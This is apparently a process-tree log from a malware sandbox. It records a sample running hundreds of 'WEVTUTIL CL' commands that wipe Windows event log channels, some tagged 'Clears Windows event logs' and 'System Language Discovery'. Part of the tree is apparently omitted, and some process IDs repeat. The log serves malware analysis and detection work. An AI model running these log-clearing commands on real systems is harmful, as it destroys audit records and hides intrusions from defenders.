C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"3⤵PID:9560
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"3⤵PID:9116
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"3⤵PID:8732
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"3⤵PID:8384
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"3⤵PID:6560
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"3⤵PID:8220
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"3⤵PID:7892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"3⤵PID:9060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:8000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"3⤵PID:6468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"3⤵
- Clears Windows event logs
PID:2468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"3⤵PID:4952
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"3⤵PID:10148
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"3⤵PID:10020
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:6700
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"3⤵PID:9764
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"3⤵PID:2508
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"3⤵PID:9644
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"3⤵PID:6508
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"3⤵PID:3640
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"3⤵PID:6736
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"3⤵PID:10388
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"3⤵PID:9388
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"3⤵PID:8652
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"3⤵PID:4852
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D12/Analytic"3⤵PID:8108
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D12/Logging"3⤵PID:7688
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D12/PerfTiming"3⤵
- System Location Discovery: System Language Discovery
PID:7588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D9/Analytic"3⤵PID:6340
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3DShaderCache/Default"3⤵PID:10352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DirectComposition/Diagnostic"3⤵PID:10152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DirectManipulation/Diagnostic"3⤵PID:9464
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"3⤵PID:6928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"3⤵PID:1972
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Disk/Operational"3⤵PID:6564
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"3⤵PID:10120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"3⤵PID:9928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"3⤵PID:5432
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dism-Api/Analytic"3⤵PID:10260
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dism-Api/ExternalAnalytic"3⤵PID:9120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dism-Api/InternalAnalytic"3⤵PID:9284
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dism-Cli/Analytic"3⤵PID:7108
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"3⤵PID:6640
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"3⤵PID:9300
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"3⤵PID:11740
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Documents/Performance"3⤵PID:10596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dot3MM/Diagnostic"3⤵PID:9916
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"3⤵PID:3748
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DucUpdateAgent/Operational"3⤵PID:10700
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-API/Diagnostic"3⤵PID:8056
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-Core/Diagnostic"3⤵PID:10936
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-Dwm/Diagnostic"3⤵PID:11148
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-Redir/Diagnostic"3⤵PID:11048
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-Udwm/Diagnostic"3⤵PID:7324
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl-Admin"3⤵PID:9056
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl-Operational"3⤵PID:8060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl/Contention"3⤵PID:7528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"3⤵
- Clears Windows event logs
PID:9348
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"3⤵PID:7576
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl/Power"3⤵PID:7492
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"3⤵
- Clears Windows event logs
PID:7032
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EDP-Application-Learning/Admin"3⤵PID:7716
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EDP-Audit-Regular/Admin"3⤵PID:6832
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EDP-Audit-TCB/Admin"3⤵PID:7992
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EFS/Debug"3⤵PID:6516
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ESE/IODiagnose"3⤵PID:6912
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ESE/Operational"3⤵
- Clears Windows event logs
PID:4840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"3⤵PID:8520
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapHost/Debug"3⤵PID:2768
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapHost/Operational"3⤵PID:10560
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapMethods-RasChap/Operational"3⤵PID:6732
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapMethods-RasTls/Operational"3⤵PID:7132
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapMethods-Sim/Operational"3⤵PID:10660
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapMethods-Ttls/Operational"3⤵PID:10928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"3⤵PID:7664
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/EventLog"3⤵PID:9012
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/Trace"3⤵PID:9628
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"3⤵PID:8756
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"3⤵PID:5632
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"3⤵PID:9408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"3⤵PID:7744
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"3⤵PID:7388
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventLog/Debug"3⤵PID:5544
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FMS/Analytic"3⤵PID:9312
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FMS/Debug"3⤵PID:10380
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FMS/Operational"3⤵PID:7592
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"3⤵PID:11040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"3⤵PID:6548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Analytic"3⤵PID:7500
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Operational"3⤵PID:7900
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Analytic"3⤵PID:6796
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Debug"3⤵PID:9636
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Analytic"3⤵PID:10792
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Debug"3⤵PID:6956
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:9540
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Debug"3⤵
- Clears Windows event logs
PID:6208
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Core/WHC"3⤵PID:2512
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Analytic"3⤵PID:8588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/BackupLog"3⤵PID:11000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Debug"3⤵PID:6408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Analytic"3⤵PID:7252
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Debug"3⤵PID:6776
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Analytic"3⤵PID:9136
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Debug"3⤵PID:8028
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Analytic"3⤵PID:3688
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Debug"3⤵PID:6644
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"3⤵PID:10740
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"3⤵PID:7424
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:9316
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"3⤵PID:6992
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"3⤵
- Clears Windows event logs
PID:11168
-
-
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBDirect/Debug"3⤵PID:2512
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBDirect/Netmon"3⤵PID:8588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Analytic"3⤵PID:11000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Audit"3⤵PID:6408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Connectivity"3⤵PID:7252
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Diagnostic"3⤵PID:6776
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Operational"3⤵PID:9136
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Performance"3⤵PID:11124
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Security"3⤵PID:6164
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Admin"3⤵PID:4236
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Informational"3⤵PID:10740
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SPB-ClassExtension/Analytic"3⤵PID:7424
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SPB-HIDI2C/Analytic"3⤵PID:9316
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Schannel-Events/Perf"3⤵PID:6992
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sdbus/Analytic"3⤵PID:11168
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sdbus/Debug"3⤵PID:9552
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sdstor/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:2352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"3⤵PID:6316
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"3⤵PID:10016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SearchUI/Diagnostic"3⤵PID:9276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SearchUI/Operational"3⤵PID:7772
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SecureAssessment/Operational"3⤵PID:7004
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Adminless/Operational"3⤵PID:6892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"3⤵PID:8532
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"3⤵PID:12016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"3⤵PID:9840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"3⤵PID:8596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"3⤵PID:8288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"3⤵PID:5408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-IdentityStore/Performance"3⤵PID:8088
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"3⤵
- Clears Windows event logs
PID:8696
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Mitigations/KernelMode"3⤵PID:9160
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Mitigations/UserMode"3⤵PID:10668
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Netlogon/Operational"3⤵PID:10548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GC/Analytic"3⤵PID:10620
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"3⤵
- Clears Windows event logs
PID:11060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"3⤵PID:9760
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP-UX/Analytic"3⤵PID:6932
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"3⤵PID:8468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-UserConsentVerifier/Audit"3⤵PID:8920
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Vault/Performance"3⤵PID:7580
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Admin"3⤵PID:7872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Operational"3⤵PID:6472
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Perf"3⤵PID:8604
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SendTo/Diagnostic"3⤵PID:6440
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sens/Debug"3⤵PID:6528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sensors/Debug"3⤵PID:10892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sensors/Performance"3⤵PID:11084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"3⤵PID:7276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension/Analytic"3⤵PID:7620
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"3⤵PID:8812
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"3⤵PID:9580
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"3⤵PID:10084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Servicing/Debug"3⤵
- Clears Windows event logs
PID:11244
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Debug"3⤵PID:6752
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Operational"3⤵PID:8016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Analytic"3⤵PID:6720
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Debug"3⤵PID:8568
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Operational"3⤵PID:8780
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync/Analytic"3⤵PID:8436
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync/Debug"3⤵PID:9032
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync/Operational"3⤵PID:5352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync/VerboseDebug"3⤵PID:8716
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Setup/Analytic"3⤵PID:10280
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"3⤵PID:10704
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SetupPlatform/Analytic"3⤵PID:11108
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"3⤵
- Clears Windows event logs
PID:7668
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"3⤵PID:9876
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"3⤵PID:3824
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"3⤵PID:10840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"3⤵
- Clears Windows event logs
PID:10040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:8916
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"3⤵PID:9804
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"3⤵PID:8496
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"3⤵PID:9444
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"3⤵
- Clears Windows event logs
PID:8632
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"3⤵PID:10664
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"3⤵PID:9692
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/ActionCenter"3⤵PID:7988
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/AppDefaults"3⤵PID:7064
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"3⤵
- Clears Windows event logs
PID:8176
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/LogonTasksChannel"3⤵PID:6820
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/Operational"3⤵PID:9832
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"3⤵PID:10180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"3⤵PID:8044
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-OpenWith/Diagnostic"3⤵PID:11088
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"3⤵PID:10900
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"3⤵PID:7932
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"3⤵PID:7848
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"3⤵PID:6448
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"3⤵PID:10644
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SleepStudy/Diagnostic"3⤵PID:8484
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmartCard-Audit/Authentication"3⤵PID:11600
-
-
